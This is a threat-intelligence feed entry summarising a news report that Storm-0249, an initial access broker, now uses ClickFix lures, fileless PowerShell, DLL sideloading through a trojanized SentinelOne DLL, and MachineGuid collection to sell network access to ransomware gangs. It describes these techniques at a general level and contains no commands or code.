Storm-0249 Adopts Advanced Tactics for Ransomware Attacks

First reported

09.12.2025 15:37

Last updated

1 unique sources, 1 articles

Summary

Hide ▲

Storm-0249, previously known as an initial access broker, has escalated its operations by employing advanced tactics such as domain spoofing, DLL sideloading, and fileless PowerShell execution to facilitate ransomware attacks. These methods allow the threat actor to bypass defenses, infiltrate networks, maintain persistence, and operate undetected. The group has shifted from mass phishing campaigns to more precise attacks, leveraging the trust associated with signed processes for added stealth. The ultimate goal is to obtain persistent access to enterprise networks and monetize them by selling access to ransomware gangs.

Timeline

09.12.2025 15:37 1 articles · 23h ago

Storm-0249 Adopts Advanced Tactics for Ransomware Attacks
Storm-0249, previously known as an initial access broker, has escalated its operations by employing advanced tactics such as domain spoofing, DLL sideloading, and fileless PowerShell execution to facilitate ransomware attacks. The group has shifted from mass phishing campaigns to more precise attacks, leveraging the trust associated with signed processes for added stealth. The ultimate goal is to obtain persistent access to enterprise networks and monetize them by selling access to ransomware gangs.
Show sources

Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
Open in new tab

Information Snippets

Storm-0249 is using ClickFix social engineering to trick targets into running malicious commands via the Windows Run dialog.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
The malicious command leverages 'curl.exe' to fetch a PowerShell script from a spoofed Microsoft domain.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
The PowerShell script executes a malicious MSI package with SYSTEM privileges, dropping a trojanized DLL associated with SentinelOne's endpoint security solution.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
The rogue DLL establishes encrypted communication with a command-and-control (C2) server.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
Storm-0249 uses legitimate Windows administrative utilities like reg.exe and findstr.exe to extract unique system identifiers such as MachineGuid.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
The use of living-off-the-land (LotL) tactics and trusted processes makes the activity difficult to detect.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37
Ransomware groups like LockBit and ALPHV use MachineGuid to bind encryption keys to individual victim systems.
First reported: 09.12.2025 15:37

1 source, 1 article
Show sources
- Storm-0249 Escalates Ransomware Attacks with ClickFix, Fileless PowerShell, and DLL Sideloading — thehackernews.com — 09.12.2025 15:37